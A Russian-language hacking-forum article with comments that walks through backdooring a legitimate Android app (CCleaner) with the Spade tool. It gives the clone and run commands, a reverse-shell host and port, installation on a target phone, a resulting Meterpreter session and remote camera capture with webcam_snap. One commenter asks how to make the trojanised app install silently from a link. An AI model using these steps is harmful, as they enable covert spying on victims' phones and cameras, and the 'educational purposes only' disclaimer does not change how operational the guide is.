Статья Взлом Android-устройства

Привет! В этой публикации, я опишу действенный способ взлома телефона под управлением ОС Android. Он основывается на сшивании полезной нагрузки с APK файлом.

Для начала скачаем любую программу под Android ( я выбрал, для примера CCleaner) с сайта , попробуем, для начала, на ней.

Затем скачиваем для нашей Kali Linux софт под названием Spade. Для этого пишем в терминале следующее:
Код:
git clone https://github.com/suraj-root/spade.git
upload_2016-10-17_20-20-41.png


После успешного выполнения команды, вводим следующее:

> ./spade.py /root/Desktop/ccleaner.apk (тут мы указываем программе, с каким файлом она должна работать)

После запуска указанной команды вас встретит меню, в котором необходимо будет выбрать тип пайлоада (я выбирал 3), затем она попросит вас указать адрес хоста, на который полезная нагрузка будет «стучаться» в попытке установить соединение. Так же необходимо будет ввести порт.

> lhost > 192.168.0.103

> lport > 4444

upload_2016-10-17_20-21-32.png


upload_2016-10-17_20-21-40.png


Запускаем процесс, который внедрит нашу полезную нагрузку в файл APK.

upload_2016-10-17_20-22-6.png


Видим привилегии, которые нам доступны:

upload_2016-10-17_20-22-32.png


Готовый файл сохраняется в директории /root/spade

upload_2016-10-17_20-22-51.png


На запрос этой настройки отвечаем утвердительно:

upload_2016-10-17_20-23-18.png


Теперь необходимо передать созданный файл нашему целевому устройству. Копируем его на телефон, устанавливая его по стандартной схеме. После запуска приложения, если все сделано, верно, то видим открывшуюся сессию meterpreter:

upload_2016-10-17_20-23-36.png


Попробуем осмотреться в системе:

upload_2016-10-17_20-23-55.png


Все работает, теперь можно испытать работу, к примеру, камеры:
Код:
webcam_snap
upload_2016-10-17_20-24-23.png


И эта команда срабатывает успешно:

upload_2016-10-17_20-24-45.png


На этом все, спасибо за внимание.

Данная статья опубликована исключительно в ознакомительных целях и не является руководством к действиям.
Ссылка на оригинал -
 
Последнее редактирование:
B

BubblehUN773R

А есть возможность использовать более 2-3 устройств?
 

invetrika

Green Team
29.06.2018
49
18
BIT
44
Перечитал всю тему, ну разложите же скорей пожалуйста по полочкам, почему матьего не создаётся файл -final.apk, блин в терминате пишет что всё нормально
 

danaez

Member
25.12.2018
9
0
BIT
0
Не хочу ни кого оскорбить или обидеть... Темы конечно классные, но они не для новичков даже если написано "для новичков"
примитивно репост, нет энтузиазма несущих свет знаний прометеев
И видосы мертвые
 
Последнее редактирование:
М

Мах

Меня нужно хакер уменя йест тел модели bbd100-1 немогу открит

Не сможешь

Goog porol nevazmojno
 

watahack

New member
11.05.2020
1
0
BIT
0
Доброго времени суток, господа. Внедрять бэкдор в приложение это всё хорошо, но меня терзают смутные сомнения относительно того, что человек станет загружать и устанавливать это приложение. Можно ли сделать так, чтобы по переходу по ссылке приложение автоматически загрузилось и установилось тоже автоматически незаметно для пользователя? Буду признателен за подсказки.
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!